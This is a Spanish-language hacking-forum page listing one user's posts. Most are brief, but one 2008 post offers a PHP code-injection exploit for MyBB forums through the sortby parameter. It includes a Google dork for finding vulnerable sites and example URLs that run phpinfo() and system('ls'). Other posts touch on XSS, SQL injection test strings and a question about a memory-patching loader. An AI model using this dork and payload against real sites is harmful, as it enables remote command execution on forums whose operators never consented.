Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Zion1024

Páginas1 2

Nivel Web / Otro BUG en MyBB

23 Enero 2008, 19:42 PM

He descubierto un bug que afecta los foros hechos en MyBB recientes.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"

Exploit:

Código [Seleccionar]


'];<comando PHP>;exit;//

Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]

Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//

http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//

by zion

Mi fuente.

Nivel Web / Re: Cross-site scripting en Apache 1.3.x y 2.2.x

23 Diciembre 2007, 11:21 AM

mas un XXS para estudiar
Gracias por la informacion.

Nivel Web / Re: SELECT junto con update sql injection

21 Diciembre 2007, 17:09 PM

A ver... no soy especialista en SQL injection pero si hablas de parametros creo que existe muchos metodos.

Un consejo, puedes mirar las opciones de algunos scanners donde figuran esas cadenas de prueba como por ejemplo /*, ' , etc. etc. que estan concatenados con los metodos SELECT y UPDATE.

Espero que te sirva el aporte

salud2

Ingeniería Inversa / fabricar un LOADER

27 Octubre 2007, 23:40 PM

hola, quisiera preguntar algo, si es que existe un programa o bien, la posibilidad de hacer que manipule direcciones de memoria de un programa y concatenarlo con acciones de otro programa. Por ejemplo: abro NOTEPAD y al dar clic en nuevo que me ejecute PAINT. He intentado con el Snippet Creator de Izcelion junto con el masm pero aun es dificil porque son muchas direcciones de memoria y codigo assembler que manejar. Si alguien tiene alguna idea de como hacerlo agradeceria mucho..
Gracias

#10

Ingeniería Inversa / KONXISE ayuda

22 Septiembre 2007, 23:37 PM

una ayudita con konxise

Páginas1 2

Test Foro de elhacker.net SMF 2.1